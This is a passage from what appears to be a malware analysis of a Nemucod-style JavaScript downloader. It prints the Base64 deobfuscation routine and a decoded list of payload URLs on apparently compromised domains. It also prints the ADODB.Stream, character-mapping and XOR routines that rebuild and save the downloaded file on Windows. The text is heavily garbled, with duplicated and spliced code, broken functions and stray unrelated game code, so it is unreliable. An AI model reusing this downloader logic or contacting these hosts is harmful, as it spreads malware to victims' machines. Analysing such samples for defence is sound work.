for(nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5){
nazadposmotrishvdrugzanzibar5HORDAI++;
try{
var nazadposmotrishvdrugzanzibar5HORDA6 =nazadposmotrishvdrugzanzibar5jji+ nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";
if(nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibar5HORDA6,nazadposmotrishvdrugzanzibar5HORDA17+nazadposmotrishvdrugzanzibar5HORDAI,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7)){
break;
}
}catch(nazadposmotrishvdrugzanzibar5QvLfAvDBhv){}
}}
}
var nazadposmotrishvdrugzanzibar5checheche = ["d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2","dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2","Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=","d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2","ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2","aW50b21pbS5jb20vZzY3ZWlobnJ2"];
var nazadposmotrishvdrugzanzibar5checheche1 = nazadposmotrishvdrugzanzibar5checheche.slice(0);
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);
Fade.fadeOut = function(nextState, time) {
tween.onComplete.add(
function() {
bg2.drawRect(0, 0, game.width, game.height);
bg2.alpha = 1;
bg2.endFill();
}, this);
tween.start();
};
2) Quick search to see if they used same methods as previous analysis :
If they didn't improved their script, remember that it was very easy to retrieve the URLS used
2-1) First : Is there still a pattern used to obfuscate the strings ? :
Only looking for the replace word ...
=> the function to do Base64 decoding (that removes some string before) :
function nikeFootballAir23 (kuloma) {
nazadposmotrishvdrugzanzibarXCOP = 0;
var nazadposmotrishvdrugzanzibarddDccC1, nazadposmotrishvdrugzanzibarddDccC2, nazadposmotrishvdrugzanzibarc3, nazadposmotrishvdrugzanzibarc4;
var nazadposmotrishvdrugzanzibarout = "";
var nazadposmotrishvdrugzanzibar5nugash= kuloma["replace"](/WEAGLEWEAGLE/g, '');
...var nazadposmotrishvdrugzanzibarddDccC1, nazadposmotrishvdrugzanzibarddDccC2, nazadposmotrishvdrugzanzibarc3, nazadposmotrishvdrugzanzibarc4;
var nazadposmotrishvdrugzanzibarout = "";
var nazadposmotrishvdrugzanzibar5nugash= kuloma["replace"](/WEAGLEWEAGLE/g, '');
}
Ok, it uses the same method, and we have found the string used to obfuscated the real Base64 encoded strings => WEAGLEWEAGLE
Note : I could have find the function name just with this :
nikeFootballAir23("c2F2WEAGLEWEAGLEZVRvRmlsZQ=WEAGLEWEAGLE=WEAGLEWEAGLE")
2-2) URLs - Let's see at the end :
var nazadposmotrishvdrugzanzibar5checheche = [
"d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2",
"dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=",
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"
]; "dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=",
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"
Array of string ...some with the pattern found : WEAGLEWEAGLE
var nazadposmotrishvdrugzanzibar5checheche = [
"d3d3LmtpbWFiaXRlcy5jb20vZzY3ZWlobnJ2",
"dGhlbWVvbmhhaS5jb20vZzY3ZWlobnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbS9nNjdlaWhucnY=",
"d3d3LnBvZGRhcnByb2Zlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"
]; "dGhlbWVvbmhhaS5jb20vZzY3ZWlobnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbS9nNjdlaWhucnY=",
"d3d3LnBvZGRhcnByb2Zlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"
Let's make a Decode from Base64 format, to test :
Base64 Decode and Encode - Online
var nazadposmotrishvdrugzanzibar5checheche = [
var nazadposmotrishvdrugzanzibar5checheche = [
"www .kimabites.com/g67eihnrv",
"themeonhai.com/g67eihnrv",
"bonzerwebsolutions.com/g67eihnrv",
"www. poddarprofessional.com/g67eihnrv",
"fliermagas.net/g67eihnrv",
"intomim.com/g67eihnrv"
]; "themeonhai.com/g67eihnrv",
"bonzerwebsolutions.com/g67eihnrv",
"www. poddarprofessional.com/g67eihnrv",
"fliermagas.net/g67eihnrv",
"intomim.com/g67eihnrv"
=> some part left ... nazadposmotrishvdrugzanzibar5checheche array
is put on :
nazadposmotrishvdrugzanzibar5checheche1 var
and used as parameter :
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);
nazadposmotrishvdrugzanzibar5checheche1 var
and used as parameter :
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);
=> Looking to the nazadposmotrishvdrugzanzibar5pereSubFunc function
=> nazadposmotrishvdrugzanzibar5checheche1
=> is named : nazadposmotrishvdrugzanzibar5_a5
if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {
if (is_run_in_windows_host) {
for(nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5){
try{
}
}try{
var nazadposmotrishvdrugzanzibar5HORDA6 =nazadposmotrishvdrugzanzibar5jji+ nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";
if(nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibar5HORDA6,nazadposmotrishvdrugzanzibar5HORDA17+nazadposmotrishvdrugzanzibar5HORDAI,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7)){
}catch(nazadposmotrishvdrugzanzibar5QvLfAvDBhv){}if(nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibar5HORDA6,nazadposmotrishvdrugzanzibar5HORDA17+nazadposmotrishvdrugzanzibar5HORDAI,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7)){
break;
}}
Simplified :if (is_run_in_windows_host) {
for(index = 0 ; index < array_of_urls.length ; index++){
}try{
}var url_to_be_used = "http://"+ nikeFootballAir23(array_of_urls[index]) +
"?DHVvPTpRF=wqxuXORJf";
...
...
...
}"?DHVvPTpRF=wqxuXORJf";
...
...
...
Complete urls :"http ://www .kimabites.com/g67eihnrv?DHVvPTpRF=wqxuXORJf"
"http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf"
"http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf"
User-agent :nazadposmotrishvdrugzanzibar5pudlimudli.setRequestHeader("User-Agent", nikeFootballAir23("TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk="));
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
2-3) The nemucod part :
var nazadposmotrishvdrugzanzibar5LUCIODOR = nikeFootballAir23("VkdSQTEgPSBmdW5jdGlvbiAoVkdSQTkpDQogew0KIHZhciBWR1JBMj1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogVkdSQTJbInR5cGUiXSA9IDI7DQogVkdSQTJbIkNoYXJzZXQiXSA9IDQzNzsNCiBWR1JBMlsib3BlbiJdKCk7DQogVkdSQTJbIkxvYWRGcm9tRmlsZSJdKFZHUkE5KTsNCiB2YXIgVkdSQTEwPVZHUkEyWyJSZWFkVGV4dCJdOw0KIFZHUkEyWyJjbG9zZSJdKCk7DQogcmV0dXJuIFZHUkEzKFZHUkExMCk7DQp9Ow0KVkdSQTMgPSBmdW5jdGlvbiAoVkdSQTEwKQ0KIHsgDQp2YXIgdDE9bmV3IEFycmF5KCk7DQp0MVsweEM3XSA9IDB4ODA7dDFbMHhGQ10gPSAweDgxO3QxWzB4RTldID0gMHg4Mjt0MVsweEUyXSA9IDB4ODM7dDFb
...
...
JpdGVUZXh0Il0oVkdSQTQoVkdSQTExKSk7DQogVkdSQTJbIlNhdmVUb0ZpbGUiXShWR1JBOSwgMik7DQogVkdSQTJbImNsb3NlIl0oKTsNCn07DQogDQpWR1JBNiA9IGZ1bmN0aW9uIChWR1JBNykNCiB7DQogZm9yICh2YXIgVGo9MDsgVGogPCBWR1JBN1sibGVuZ3RoIl07IFRqKyspDQogIHsNCiBWR1JBN1tUal0gXj0gVkdSQThbTWF0aC5mbG9vcihUaiAlIFZHUkE4Lmxlbmd0aCldOw0KIH0gDQogcmV0dXJuIFZHUkE3Ow0KfTsg");
The string in red (a long part has been cut) : an obfuscated string.
It calls the nikeFootballAir23 function, to make Base64 decoding.
Interesting to note that it doesn't content any pattern WEAGLEWEAGLE :
=> only a copy-paste on a Base64 decoding tool give the real part
=> The part used to deobfuscate the payload to make it the real file
//Load the file from HD, first decipher function
VGRA1 = function (VGRA9)
{
var VGRA2=WScript["CreateObject"]("ADODB.Stream");
VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["LoadFromFile"](VGRA9);
var VGRA10=VGRA2["ReadText"];
VGRA2["close"]();
return VGRA3(VGRA10);
};VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["LoadFromFile"](VGRA9);
var VGRA10=VGRA2["ReadText"];
VGRA2["close"]();
return VGRA3(VGRA10);
// First Decipher function
VGRA3 = function (VGRA10)
{
var t1=new Array();
t1[0xC7] = 0x80;t1[0xFC] = 0x81;t1[0xE9] = 0x82;t1[0xE2] = 0x83;t1[0xE4] = 0x84;t1[0xE0] = 0x85;t1[0xE5] = 0x86;t1[0xE7] = 0x87;t1[0xEA] = 0x88;t1[0xEB] = 0x89;t1[0xE8] = 0x8A;t1[0xEF] = 0x8B;t1[0xEE] = 0x8C;t1[0xEC] = 0x8D;t1[0xC4] = 0x8E;t1[0xC5] = 0x8F;t1[0xC9] = 0x90;t1[0xE6] = 0x91;t1[0xC6] = 0x92;t1[0xF4] = 0x93;t1[0xF6] = 0x94;t1[0xF2] = 0x95;t1[0xFB] = 0x96;t1[0xF9] = 0x97;t1[0xFF] = 0x98;t1[0xD6] = 0x99;t1[0xDC] = 0x9A;t1[0xA2] = 0x9B;t1[0xA3] = 0x9C;t1[0xA5] = 0x9D;t1[0x20A7] = 0x9E;t1[0x192] = 0x9F;t1[0xE1] = 0xA0;t1[0xED] = 0xA1;t1[0xF3] = 0xA2;t1[0xFA] = 0xA3;t1[0xF1] = 0xA4;t1[0xD1] = 0xA5;t1[0xAA] = 0xA6;t1[0xBA] = 0xA7;t1[0xBF] = 0xA8;t1[0x2310] = 0xA9;t1[0xAC] = 0xAA;t1[0xBD] = 0xAB;t1[0xBC] = 0xAC;t1[0xA1] = 0xAD;t1[0xAB] = 0xAE;t1[0xBB] = 0xAF;t1[0x2591] = 0xB0;t1[0x2592] = 0xB1;t1[0x2593] = 0xB2;t1[0x2502] = 0xB3;t1[0x2524] = 0xB4;t1[0x2561] = 0xB5;t1[0x2562] = 0xB6;t1[0x2556] = 0xB7;t1[0x2555] = 0xB8;t1[0x2563] = 0xB9;t1[0x2551] = 0xBA;t1[0x2557] = 0xBB;t1[0x255D] = 0xBC;t1[0x255C] = 0xBD;t1[0x255B] = 0xBE;t1[0x2510] = 0xBF;t1[0x2514] = 0xC0;t1[0x2534] = 0xC1;t1[0x252C] = 0xC2;t1[0x251C] = 0xC3;
t1[0x2500] = 0xC4;t1[0x253C] = 0xC5;t1[0x255E] = 0xC6;t1[0x255F] = 0xC7;t1[0x255A] = 0xC8;t1[0x2554] = 0xC9;t1[0x2569] = 0xCA;t1[0x2566] = 0xCB;t1[0x2560] = 0xCC;t1[0x2550] = 0xCD;t1[0x256C] = 0xCE;t1[0x2567] = 0xCF;t1[0x2568] = 0xD0;t1[0x2564] = 0xD1;t1[0x2565] = 0xD2;t1[0x2559] = 0xD3;t1[0x2558] = 0xD4;t1[0x2552] = 0xD5;t1[0x2553] = 0xD6;t1[0x256B] = 0xD7;t1[0x256A] = 0xD8;t1[0x2518] = 0xD9;t1[0x250C] = 0xDA;t1[0x2588] = 0xDB;t1[0x2584] = 0xDC;t1[0x258C] = 0xDD;t1[0x2590] = 0xDE;t1[0x2580] = 0xDF;t1[0x3B1] = 0xE0;t1[0xDF] = 0xE1;t1[0x393] = 0xE2;t1[0x3C0] = 0xE3;t1[0x3A3] = 0xE4;t1[0x3C3] = 0xE5;t1[0xB5] = 0xE6;t1[0x3C4] = 0xE7;t1[0x3A6] = 0xE8;t1[0x398] = 0xE9;t1[0x3A9] = 0xEA;t1[0x3B4] = 0xEB;
t1[0x221E] = 0xEC;t1[0x3C6] = 0xED;t1[0x3B5] = 0xEE;t1[0x2229] = 0xEF;t1[0x2261] = 0xF0;t1[0xB1] = 0xF1;t1[0x2265] = 0xF2;t1[0x2264] = 0xF3;t1[0x2320] = 0xF4;t1[0x2321] = 0xF5;t1[0xF7] = 0xF6;t1[0x2248] = 0xF7;t1[0xB0] = 0xF8;t1[0x2219] = 0xF9;t1[0xB7] = 0xFA;t1[0x221A] = 0xFB;t1[0x207F] = 0xFC;t1[0xB2] = 0xFD;t1[0x25A0] = 0xFE;t1[0xA0] = 0xFF;
var resultArray=new Array();
for (var Tj=0; Tj < VGRA10["length"]; Tj++)
{
return resultArray;
};t1[0xC7] = 0x80;t1[0xFC] = 0x81;t1[0xE9] = 0x82;t1[0xE2] = 0x83;t1[0xE4] = 0x84;t1[0xE0] = 0x85;t1[0xE5] = 0x86;t1[0xE7] = 0x87;t1[0xEA] = 0x88;t1[0xEB] = 0x89;t1[0xE8] = 0x8A;t1[0xEF] = 0x8B;t1[0xEE] = 0x8C;t1[0xEC] = 0x8D;t1[0xC4] = 0x8E;t1[0xC5] = 0x8F;t1[0xC9] = 0x90;t1[0xE6] = 0x91;t1[0xC6] = 0x92;t1[0xF4] = 0x93;t1[0xF6] = 0x94;t1[0xF2] = 0x95;t1[0xFB] = 0x96;t1[0xF9] = 0x97;t1[0xFF] = 0x98;t1[0xD6] = 0x99;t1[0xDC] = 0x9A;t1[0xA2] = 0x9B;t1[0xA3] = 0x9C;t1[0xA5] = 0x9D;t1[0x20A7] = 0x9E;t1[0x192] = 0x9F;t1[0xE1] = 0xA0;t1[0xED] = 0xA1;t1[0xF3] = 0xA2;t1[0xFA] = 0xA3;t1[0xF1] = 0xA4;t1[0xD1] = 0xA5;t1[0xAA] = 0xA6;t1[0xBA] = 0xA7;t1[0xBF] = 0xA8;t1[0x2310] = 0xA9;t1[0xAC] = 0xAA;t1[0xBD] = 0xAB;t1[0xBC] = 0xAC;t1[0xA1] = 0xAD;t1[0xAB] = 0xAE;t1[0xBB] = 0xAF;t1[0x2591] = 0xB0;t1[0x2592] = 0xB1;t1[0x2593] = 0xB2;t1[0x2502] = 0xB3;t1[0x2524] = 0xB4;t1[0x2561] = 0xB5;t1[0x2562] = 0xB6;t1[0x2556] = 0xB7;t1[0x2555] = 0xB8;t1[0x2563] = 0xB9;t1[0x2551] = 0xBA;t1[0x2557] = 0xBB;t1[0x255D] = 0xBC;t1[0x255C] = 0xBD;t1[0x255B] = 0xBE;t1[0x2510] = 0xBF;t1[0x2514] = 0xC0;t1[0x2534] = 0xC1;t1[0x252C] = 0xC2;t1[0x251C] = 0xC3;
t1[0x2500] = 0xC4;t1[0x253C] = 0xC5;t1[0x255E] = 0xC6;t1[0x255F] = 0xC7;t1[0x255A] = 0xC8;t1[0x2554] = 0xC9;t1[0x2569] = 0xCA;t1[0x2566] = 0xCB;t1[0x2560] = 0xCC;t1[0x2550] = 0xCD;t1[0x256C] = 0xCE;t1[0x2567] = 0xCF;t1[0x2568] = 0xD0;t1[0x2564] = 0xD1;t1[0x2565] = 0xD2;t1[0x2559] = 0xD3;t1[0x2558] = 0xD4;t1[0x2552] = 0xD5;t1[0x2553] = 0xD6;t1[0x256B] = 0xD7;t1[0x256A] = 0xD8;t1[0x2518] = 0xD9;t1[0x250C] = 0xDA;t1[0x2588] = 0xDB;t1[0x2584] = 0xDC;t1[0x258C] = 0xDD;t1[0x2590] = 0xDE;t1[0x2580] = 0xDF;t1[0x3B1] = 0xE0;t1[0xDF] = 0xE1;t1[0x393] = 0xE2;t1[0x3C0] = 0xE3;t1[0x3A3] = 0xE4;t1[0x3C3] = 0xE5;t1[0xB5] = 0xE6;t1[0x3C4] = 0xE7;t1[0x3A6] = 0xE8;t1[0x398] = 0xE9;t1[0x3A9] = 0xEA;t1[0x3B4] = 0xEB;
t1[0x221E] = 0xEC;t1[0x3C6] = 0xED;t1[0x3B5] = 0xEE;t1[0x2229] = 0xEF;t1[0x2261] = 0xF0;t1[0xB1] = 0xF1;t1[0x2265] = 0xF2;t1[0x2264] = 0xF3;t1[0x2320] = 0xF4;t1[0x2321] = 0xF5;t1[0xF7] = 0xF6;t1[0x2248] = 0xF7;t1[0xB0] = 0xF8;t1[0x2219] = 0xF9;t1[0xB7] = 0xFA;t1[0x221A] = 0xFB;t1[0x207F] = 0xFC;t1[0xB2] = 0xFD;t1[0x25A0] = 0xFE;t1[0xA0] = 0xFF;
var resultArray=new Array();
for (var Tj=0; Tj < VGRA10["length"]; Tj++)
{
var OVc9=VGRA10["charCodeAt"](Tj);
if (OVc9 < 128) {
}
resultArray["push"](HIi3);
};if (OVc9 < 128) {
var HIi3=OVc9;}
else {var HIi3=t1[OVc9];
resultArray["push"](HIi3);
return resultArray;
// second decipher function
VGRA4 = function (VGRA11)
{
var t2=new Array();
t2[0x80] = 0x00C7;t2[0x81] = 0x00FC;t2[0x82] = 0x00E9;t2[0x83] = 0x00E2;t2[0x84] = 0x00E4;t2[0x85] = 0x00E0;t2[0x86] = 0x00E5;t2[0x87] = 0x00E7;t2[0x88] = 0x00EA;t2[0x89] = 0x00EB;t2[0x8A] = 0x00E8;t2[0x8B] = 0x00EF;t2[0x8C] = 0x00EE;t2[0x8D] = 0x00EC;t2[0x8E] = 0x00C4;t2[0x8F] = 0x00C5;t2[0x90] = 0x00C9;t2[0x91] = 0x00E6;t2[0x92] = 0x00C6;t2[0x93] = 0x00F4;t2[0x94] = 0x00F6;t2[0x95] = 0x00F2;t2[0x96] = 0x00FB;t2[0x97] = 0x00F9;t2[0x98] = 0x00FF;t2[0x99] = 0x00D6;t2[0x9A] = 0x00DC;t2[0x9B] = 0x00A2;t2[0x9C] = 0x00A3;t2[0x9D] = 0x00A5;t2[0x9E] = 0x20A7;t2[0x9F] = 0x0192;t2[0xA0] = 0x00E1;t2[0xA1] = 0x00ED;t2[0xA2] = 0x00F3;t2[0xA3] = 0x00FA;t2[0xA4] = 0x00F1;t2[0xA5] = 0x00D1;t2[0xA6] = 0x00AA;t2[0xA7] = 0x00BA;t2[0xA8] = 0x00BF;t2[0xA9] = 0x2310;t2[0xAA] = 0x00AC;t2[0xAB] = 0x00BD;t2[0xAC] = 0x00BC;t2[0xAD] = 0x00A1;t2[0xAE] = 0x00AB;t2[0xAF] = 0x00BB;t2[0xB0] = 0x2591;t2[0xB1] = 0x2592;t2[0xB2] = 0x2593;t2[0xB3] = 0x2502;t2[0xB4] = 0x2524;t2[0xB5] = 0x2561;t2[0xB6] = 0x2562;t2[0xB7] = 0x2556;t2[0xB8] = 0x2555;t2[0xB9] = 0x2563;t2[0xBA] = 0x2551;t2[0xBB] = 0x2557;t2[0xBC] = 0x255D;t2[0xBD] = 0x255C;t2[0xBE] = 0x255B;t2[0xBF] = 0x2510;t2[0xC0] = 0x2514;t2[0xC1] = 0x2534;t2[0xC2] = 0x252C;t2[0xC3] = 0x251C;t2[0xC4] = 0x2500;t2[0xC5] = 0x253C;t2[0xC6] = 0x255E;t2[0xC7] = 0x255F;t2[0xC8] = 0x255A;t2[0xC9] = 0x2554;t2[0xCA] = 0x2569;t2[0xCB] = 0x2566;t2[0xCC] = 0x2560;t2[0xCD] = 0x2550;t2[0xCE] = 0x256C;t2[0xCF] = 0x2567;t2[0xD0] = 0x2568;t2[0xD1] = 0x2564;t2[0xD2] = 0x2565;t2[0xD3] = 0x2559;t2[0xD4] = 0x2558;t2[0xD5] = 0x2552;t2[0xD6] = 0x2553;t2[0xD7] = 0x256B;t2[0xD8] = 0x256A;t2[0xD9] = 0x2518;t2[0xDA] = 0x250C;t2[0xDB] = 0x2588;t2[0xDC] = 0x2584;t2[0xDD] = 0x258C;t2[0xDE] = 0x2590;t2[0xDF] = 0x2580;t2[0xE0] = 0x03B1;t2[0xE1] = 0x00DF;t2[0xE2] = 0x0393;t2[0xE3] = 0x03C0;t2[0xE4] = 0x03A3;t2[0xE5] = 0x03C3;t2[0xE6] = 0x00B5;t2[0xE7] = 0x03C4;t2[0xE8] = 0x03A6;t2[0xE9] = 0x0398;t2[0xEA] = 0x03A9;t2[0xEB] = 0x03B4;t2[0xEC] = 0x221E;t2[0xED] = 0x03C6;t2[0xEE] = 0x03B5;t2[0xEF] = 0x2229;t2[0xF0] = 0x2261;t2[0xF1] = 0x00B1;t2[0xF2] = 0x2265;t2[0xF3] = 0x2264;t2[0xF4] = 0x2320;t2[0xF5] = 0x2321;t2[0xF6] = 0x00F7;t2[0xF7] = 0x2248;t2[0xF8] = 0x00B0;t2[0xF9] = 0x2219;t2[0xFA] = 0x00B7;t2[0xFB] = 0x221A;t2[0xFC] = 0x207F;t2[0xFD] = 0x00B2;t2[0xFE] = 0x25A0;t2[0xFF] = 0x00A0;
t2[0x80] = 0x00C7;t2[0x81] = 0x00FC;t2[0x82] = 0x00E9;t2[0x83] = 0x00E2;t2[0x84] = 0x00E4;t2[0x85] = 0x00E0;t2[0x86] = 0x00E5;t2[0x87] = 0x00E7;t2[0x88] = 0x00EA;t2[0x89] = 0x00EB;t2[0x8A] = 0x00E8;t2[0x8B] = 0x00EF;t2[0x8C] = 0x00EE;t2[0x8D] = 0x00EC;t2[0x8E] = 0x00C4;t2[0x8F] = 0x00C5;t2[0x90] = 0x00C9;t2[0x91] = 0x00E6;t2[0x92] = 0x00C6;t2[0x93] = 0x00F4;t2[0x94] = 0x00F6;t2[0x95] = 0x00F2;t2[0x96] = 0x00FB;t2[0x97] = 0x00F9;t2[0x98] = 0x00FF;t2[0x99] = 0x00D6;t2[0x9A] = 0x00DC;t2[0x9B] = 0x00A2;t2[0x9C] = 0x00A3;t2[0x9D] = 0x00A5;t2[0x9E] = 0x20A7;t2[0x9F] = 0x0192;t2[0xA0] = 0x00E1;t2[0xA1] = 0x00ED;t2[0xA2] = 0x00F3;t2[0xA3] = 0x00FA;t2[0xA4] = 0x00F1;t2[0xA5] = 0x00D1;t2[0xA6] = 0x00AA;t2[0xA7] = 0x00BA;t2[0xA8] = 0x00BF;t2[0xA9] = 0x2310;t2[0xAA] = 0x00AC;t2[0xAB] = 0x00BD;t2[0xAC] = 0x00BC;t2[0xAD] = 0x00A1;t2[0xAE] = 0x00AB;t2[0xAF] = 0x00BB;t2[0xB0] = 0x2591;t2[0xB1] = 0x2592;t2[0xB2] = 0x2593;t2[0xB3] = 0x2502;t2[0xB4] = 0x2524;t2[0xB5] = 0x2561;t2[0xB6] = 0x2562;t2[0xB7] = 0x2556;t2[0xB8] = 0x2555;t2[0xB9] = 0x2563;t2[0xBA] = 0x2551;t2[0xBB] = 0x2557;t2[0xBC] = 0x255D;t2[0xBD] = 0x255C;t2[0xBE] = 0x255B;t2[0xBF] = 0x2510;t2[0xC0] = 0x2514;t2[0xC1] = 0x2534;t2[0xC2] = 0x252C;t2[0xC3] = 0x251C;t2[0xC4] = 0x2500;t2[0xC5] = 0x253C;t2[0xC6] = 0x255E;t2[0xC7] = 0x255F;t2[0xC8] = 0x255A;t2[0xC9] = 0x2554;t2[0xCA] = 0x2569;t2[0xCB] = 0x2566;t2[0xCC] = 0x2560;t2[0xCD] = 0x2550;t2[0xCE] = 0x256C;t2[0xCF] = 0x2567;t2[0xD0] = 0x2568;t2[0xD1] = 0x2564;t2[0xD2] = 0x2565;t2[0xD3] = 0x2559;t2[0xD4] = 0x2558;t2[0xD5] = 0x2552;t2[0xD6] = 0x2553;t2[0xD7] = 0x256B;t2[0xD8] = 0x256A;t2[0xD9] = 0x2518;t2[0xDA] = 0x250C;t2[0xDB] = 0x2588;t2[0xDC] = 0x2584;t2[0xDD] = 0x258C;t2[0xDE] = 0x2590;t2[0xDF] = 0x2580;t2[0xE0] = 0x03B1;t2[0xE1] = 0x00DF;t2[0xE2] = 0x0393;t2[0xE3] = 0x03C0;t2[0xE4] = 0x03A3;t2[0xE5] = 0x03C3;t2[0xE6] = 0x00B5;t2[0xE7] = 0x03C4;t2[0xE8] = 0x03A6;t2[0xE9] = 0x0398;t2[0xEA] = 0x03A9;t2[0xEB] = 0x03B4;t2[0xEC] = 0x221E;t2[0xED] = 0x03C6;t2[0xEE] = 0x03B5;t2[0xEF] = 0x2229;t2[0xF0] = 0x2261;t2[0xF1] = 0x00B1;t2[0xF2] = 0x2265;t2[0xF3] = 0x2264;t2[0xF4] = 0x2320;t2[0xF5] = 0x2321;t2[0xF6] = 0x00F7;t2[0xF7] = 0x2248;t2[0xF8] = 0x00B0;t2[0xF9] = 0x2219;t2[0xFA] = 0x00B7;t2[0xFB] = 0x221A;t2[0xFC] = 0x207F;t2[0xFD] = 0x00B2;t2[0xFE] = 0x25A0;t2[0xFF] = 0x00A0;
var EGj=new Array();
var resultString="";
var HIi3; var OVc9;
for (var Tj=0; Tj < VGRA11["length"]; Tj++)
{
{OVc9=HIi3;}
else
} resultString=EGj["join"]("");
return resultString;
};var resultString="";
var HIi3; var OVc9;
for (var Tj=0; Tj < VGRA11["length"]; Tj++)
{
HIi3=VGRA11[Tj];
if (HIi3 < 128) else
{OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));}
return resultString;
//Save the file to the HD after first decipher call
VGRA5 = function (VGRA9, VGRA11)
{
var VGRA2=WScript["CreateObject"]("ADODB.Stream");
VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["writeText"](VGRA4(VGRA11));
VGRA2["SaveToFile"](VGRA9, 2);
VGRA2["close"]();
};VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["writeText"](VGRA4(VGRA11));
VGRA2["SaveToFile"](VGRA9, 2);
VGRA2["close"]();
// deobfuscation with XOR
VGRA6 = function (VGRA7)
{
for (var Tj=0; Tj < VGRA7["length"]; Tj++)
{
return VGRA7;
};{
VGRA7[Tj] ^= VGRA8[Math.floor(Tj % VGRA8.length)];
} return VGRA7;
=> Calls from "normal" parts !
- var VGRA8 = VGRA3("McnUKv40gkyAZaLozJMn9Xgr40VGHhbj");
= VGRA1(nazadposmotrishvdrugzanzibarloverIamChild);
- nazadposmotrishvdrugzanzibar5FrankSinatra = VGRA6(nazadposmotrishvdrugzanzibar5FrankSinatra);
- VGRA5(nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5FrankSinatra );
2-4) Run parts :=> "McnUKv40gkyAZaLozJMn9Xgr40VGHhbj" : 'obfuscated' string
- var nazadposmotrishvdrugzanzibar5FrankSinatra => VGRA8 : Array of char codes deciphered by VGRA3 function and that will be used for the XOR part
- But, only char codes above, or equal, to 128 are changed :
- But, only char codes above, or equal, to 128 are changed :
var OVc9=VGRA10["charCodeAt"](Tj);
if (OVc9 < 128) {
else {
resultArray["push"](HIi3);
=> "McnUKv40gkyAZaLozJMn9Xgr40VGHhbj"
